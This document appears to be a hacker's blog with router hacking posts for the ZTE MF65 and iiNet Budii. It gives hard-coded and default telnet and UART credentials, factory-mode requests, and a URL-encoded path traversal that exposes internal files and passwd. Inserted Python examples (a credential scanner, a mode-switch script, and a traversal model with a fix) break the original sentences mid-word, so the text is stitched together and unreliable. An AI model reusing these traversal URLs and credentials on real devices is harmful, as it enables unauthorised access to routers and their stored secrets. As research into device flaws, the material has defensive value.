
Showing posts from 2017

///ZTE mf65 Mode Switch(Updated)///

UPDATED (2017). Download this file: mode.html. Upload it to any web directory on the device and use it to switch between modes from a browser.

Modes:

    factory_mode   Download Mode (DIAG+AT+MODEM)
    debug_mode     Debug Mode (RNDIS+DIAG+AT+MODEM)
    work_mode      Work Mode (RNDIS)

1. After you have selected and applied the switch, check the page title for status, then refresh.

To return to the default mode, send AT+ZCDRUN=9 and then AT+ZCDRUN=F to the COM(X) port named "ZTE NMEA Device".

///////ZTE MF65 -- Unlocking A Few More features (Fastboot)

/mf65_efs/Secondary/web/js/config/ufi/mf65/menu.js   or   /js/config/ufi/mf65/menu.js

By changing the file that controls the menus we can enable/disable a few more options, such as:

    ((#phonebook))       #group_common #group_family #group_friend #group_colleague
    ((#status))          #STK #traffic_alert #USSD
    ((#Wifi_setting))    #ap_station
    ((#device_setting))  #update_management #dlna_setting #fastboot
    ((#firewall))        #port_filter #port_forward #port_map #system_security #dmz #upnp

We simply remove the commenting-out and re-upload the file; this enables any function that has been left out. Use/see the previous methods for ways to do this if unsure.

[extra note] This file can also be used to disable the httpshare for guests. The same file can be used to either strengthen or weaken the router's structure and presentation to anyone able to access its web server.

iiNet Budii(1031) (Telnet Access)(With Username and Password)

Telnet was always another open port available to us from the network, although it never responded to any login attempts even when we knew for certain that the username and password were correct. This was solvable by one of two approaches.

(1) The easiest by far was to simply grab the consumer release of the firmware; inside its folders is a compilable C file for telnet (they've named it telnetc):

    Budii1016_consumer_release/bcm963xx_4.12L.01_consumer/userspace/gpl/apps/telnetc

This is a pretty basic busybox telnet file. A few modifications have been made over the years; one includes this little snippet:

    telnet_data_set_autheninfo(&g_telnet_data, "iismshamswii", "i20U18r4E3");
    addr.s_addr = inet_addr("10.1.1.1");
    telnet_data_set_serverinfo(&g_telnet_data, &addr, 23);

meaning that iismshamswii will work as the username with i20U18r4E3 as the password, so we have logged
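The credentials above were found by reading the shipped source by hand. As an added example (not code from the original post or from the Budii firmware), here is a small scanner that pulls that kind of hard-coded login out of C source automatically. SAMPLE_C is constructed here to mirror the quoted telnetc lines; the telnet_data_set_* function names are the ones the post shows, and the generic password-assignment pattern is my own addition for other firmware trees.

```python
# Added example: find hard-coded telnet logins in C source.
# Not code from the post or the firmware; SAMPLE_C is a constructed stand-in
# shaped like the telnetc snippet quoted above.
import re
from dataclasses import dataclass
from typing import List, Optional

SAMPLE_C = r'''
/* constructed sample in the shape of userspace/gpl/apps/telnetc */
int main(void)
{
    struct in_addr addr;
    telnet_data_set_autheninfo(&g_telnet_data, "iismshamswii", "i20U18r4E3");
    addr.s_addr = inet_addr("10.1.1.1");
    telnet_data_set_serverinfo(&g_telnet_data, &addr, 23);
    return 0;
}
'''


@dataclass
class HardcodedLogin:
    username: str
    password: str
    host: Optional[str]
    port: Optional[int]
    where: str          # which pattern matched, for triage


# The exact call shape quoted in the post: (ctx, "user", "pass").
AUTH_RE = re.compile(
    r'telnet_data_set_autheninfo\s*\(\s*[^,]+,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)')
ADDR_RE = re.compile(r'inet_addr\s*\(\s*"([^"]+)"\s*\)')
PORT_RE = re.compile(
    r'telnet_data_set_serverinfo\s*\(\s*[^,]+,\s*[^,]+,\s*(\d+)\s*\)')
# Generic fallback (my addition): char *some_pwd = "literal";
GENERIC_RE = re.compile(
    r'(?:password|passwd|pwd|secret)\w*\s*(?:\[\s*\]\s*)?=\s*"([^"]+)"', re.I)


def find_hardcoded_logins(source: str) -> List[HardcodedLogin]:
    """Return every hard-coded login found in `source`, with target if present."""
    host = ADDR_RE.search(source)
    port = PORT_RE.search(source)
    found = [
        HardcodedLogin(user, pw,
                       host.group(1) if host else None,
                       int(port.group(1)) if port else None,
                       "telnet_data_set_autheninfo")
        for user, pw in AUTH_RE.findall(source)
    ]
    for m in GENERIC_RE.finditer(source):
        # No username is recoverable from a bare assignment; flag the secret only.
        found.append(HardcodedLogin("?", m.group(1), None, None, "generic-assignment"))
    return found


if __name__ == "__main__":
    for hit in find_hardcoded_logins(SAMPLE_C):
        print("%s: %s:%s -> %s:%s" % (hit.where, hit.username, hit.password,
                                      hit.host, hit.port))
```

Run it over a whole GPL drop with `find ... -name '*.c'` and feed each file to find_hardcoded_logins; anything with a host and port is a ready-made login, and the generic hits are worth a manual look.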

//////ZTE MF65 -- EFS acess method / partial Fs dump

In the last MF65 post we covered the local file listing method and briefly touched on the changes to the config file for constant file listing of the SD card functions. I managed to soft-brick my device by directory traversal on the SD card base path: the router would try to load the httpshare page, get to the share path and SD base path, end up just reading /mmc2/../, and then freak out and not load, so it sat around for a while.

Now I'm back and have a solution that fixes my problem and gives us access to the internal files. We will need a Windows machine (XP or later), QPST, the modem drivers and PuTTY (ZTE WCDMA Technologies MSM?). If you cannot find the drivers keep looking, they are around; try the dcunlocker support files (I had to try several drivers before my machine acknowledged them).

Using:

    /goform/goform_process?goformId=MODE_SWITCH&switchCmd=FACTORY

we get these devices: ZTE Diagn
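The mode switch post above and this one both drive the same goform request, one through mode.html and one by hand. As an added example (not code from the original posts), here is the same switch done from a script, reading the result back from the page title as the first post suggests. Assumed and not from the page: the router address 192.168.0.1, and the DEBUG/WORK switchCmd values (only FACTORY is shown on the page). SAMPLE_RESPONSE is a constructed reply used to exercise the title check offline.

```python
# Added example: issue the MF65 MODE_SWITCH request and read the status title.
# Not code from the posts. Router address and the non-FACTORY command values
# are assumptions; SAMPLE_RESPONSE is constructed, not a real capture.
import re
import urllib.parse
import urllib.request

ROUTER = "http://192.168.0.1"        # assumed; change to your device
GOFORM = "/goform/goform_process"    # endpoint quoted in the post

SWITCH_CMDS = {
    "factory_mode": "FACTORY",   # Download Mode (DIAG+AT+MODEM), from the post
    "debug_mode": "DEBUG",       # assumed value
    "work_mode": "WORK",         # assumed value
}


def mode_switch_url(mode, base=ROUTER):
    """URL that asks the device to switch to `mode`; the request mode.html makes."""
    if mode not in SWITCH_CMDS:
        raise ValueError("unknown mode %r, expected one of %s"
                         % (mode, sorted(SWITCH_CMDS)))
    query = urllib.parse.urlencode(
        {"goformId": "MODE_SWITCH", "switchCmd": SWITCH_CMDS[mode]})
    return "%s%s?%s" % (base, GOFORM, query)


_TITLE_RE = re.compile(r"<title[^>]*>(.*?)</title>", re.I | re.S)


def page_title(html):
    """The post says the status is reported in the page title; '' if absent."""
    m = _TITLE_RE.search(html)
    return " ".join(m.group(1).split()) if m else ""


def switch_mode(mode, base=ROUTER, timeout=5.0):
    """Issue the switch and return the status the device reports in its title.

    After a switch to factory_mode the USB interface re-enumerates, so a
    follow-up request may fail until the new composition is up.
    """
    with urllib.request.urlopen(mode_switch_url(mode, base), timeout=timeout) as resp:
        return page_title(resp.read().decode("utf-8", "replace"))


# Constructed reply for the offline check below (not a real device response).
SAMPLE_RESPONSE = ("<html><head><title>\n  success \n</title></head>"
                   "<body></body></html>")

if __name__ == "__main__":
    print(mode_switch_url("factory_mode"))
    print(page_title(SAMPLE_RESPONSE))
    # print(switch_mode("factory_mode"))   # run this only against a lab device
```

As with mode.html, refresh or re-request after the switch; the title check is the only status the device gives back, so treat an empty title as "unknown", not as success.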

iiNet Budii(1031) Local File Listing (USBwebserver)

This is a method to list the local files on the router via wftp (USBwebserver). It requires a login and a USB stick inserted into one of the aux USB ports (FAT/NTFS) (*1).

Either go to:

    http://10.1.1.1/usb_wftp_server.html

or:

    http://10.1.1.1/websrv_cfg.cmd?action=save&wftp_enable=1&wftp_remote=0&port=8000&path=*&partitionindex=1&disk_index=0&disk_name=sdb

(you may need to use the UI to turn this on) to turn on the file server. Now point your browser here:

    http://10.1.1.1/usb_wftp_tree.cmd?diskname=..%2f..%2f

(notice the URL encoding: the straight traversal is rejected by the web server, never even making its way to the app, but with encoded slashes we beat the checks) and click save. Now we go to:

    http://10.1.1.1:8000

and we see our router's internal files. With this enabled we can wget out a copy of the system's memory and scrape/view many of the files, including the passwd file, in the web browser:
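The reason `..%2f..%2f` works while `../../` does not is a check done on the raw query string before decoding. As an added example (not code from the original post or from the Budii firmware), the model below reproduces that mistake and the fix: frontend_check() stands in for the web server's filter the post describes (a literal "../" is rejected before the app sees it), app_resolve() stands in for the app decoding the value afterwards and joining it to the USB share root, and safe_resolve() is the hardened version. The share root and the front-end/app split are assumptions, not details taken from the page.

```python
# Added example: why a pre-decode traversal filter is bypassed by %2f, and the
# decode-normalise-confine fix. Not code from the post or the firmware; the
# share root and the two-layer split are assumptions.
import posixpath
from typing import Optional
from urllib.parse import unquote

SHARE_ROOT = "/mnt/usb"   # assumed mount point of the inserted USB disk


def frontend_check(raw_value: str) -> bool:
    """Naive filter on the still-encoded value: only a literal '../' is caught."""
    return "../" not in raw_value and "..\\" not in raw_value


def app_resolve(raw_value: str) -> str:
    """Vulnerable app side: decodes after the check and joins without confinement."""
    disk = unquote(raw_value)                        # "..%2f..%2f" -> "../../"
    return posixpath.normpath(posixpath.join(SHARE_ROOT, disk))


def vulnerable_tree(raw_value: str) -> Optional[str]:
    """Path the file server would expose for ?diskname=<raw_value>; None if filtered."""
    if not frontend_check(raw_value):
        return None
    return app_resolve(raw_value)


def safe_resolve(raw_value: str, root: str = SHARE_ROOT) -> Optional[str]:
    """Hardened version: decode until stable, normalise, then confine under root."""
    decoded = raw_value
    for _ in range(3):                               # bounded; defeats double encoding
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    if "\x00" in decoded:                            # a NUL would truncate a C path
        return None
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    if candidate != root and not candidate.startswith(root + "/"):
        return None                                  # escaped the share root
    return candidate


if __name__ == "__main__":
    for value in ("sdb", "../../", "..%2f..%2f", "%252e%252e%2f"):
        print("%-16s vulnerable=%-14s safe=%s"
              % (value, vulnerable_tree(value), safe_resolve(value)))
```

The check has to run on the value the application will actually use, after every decoding step it performs; checking the wire form and then decoding is exactly the gap the encoded slashes walk through.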

iiNet Budii(1031) (UART based privesc attacks)

Opening the case we find an internal USB port; we can also see an Altera MAX JTAG breakout, a large set of GPIO pins and a UART breakout. Connecting to the UART and booting, we can see the modem is running a Broadcom firmware:

[bootlog.samp]
CFE version 1.0.38-112.118 for BCM96362 (32bit,SP,BE)
Build Date: Fri Dec 6 11:09:42 CST 2013 (root@Ayecom)
Copyright (C) 2000-2011 Broadcom Corporation.

** Chip ID: BCM6362B0, MIPS: 400MHz, DDR: 333MHz, Bus: 166MHz
** Total Memory: 134217728 bytes (128MB)
Default host run file name : vmlinux
Default host flash file name : bcm963xx_fs_kernel
[/bootlog.samp]

The usernames available to us are: (user:admin/password:admin) (user:user/password:user). Upon logging in we are brought into a console (consoled); the commands available to admin are:

[?.samp]
help  logout  exit  quit  reboot  adsl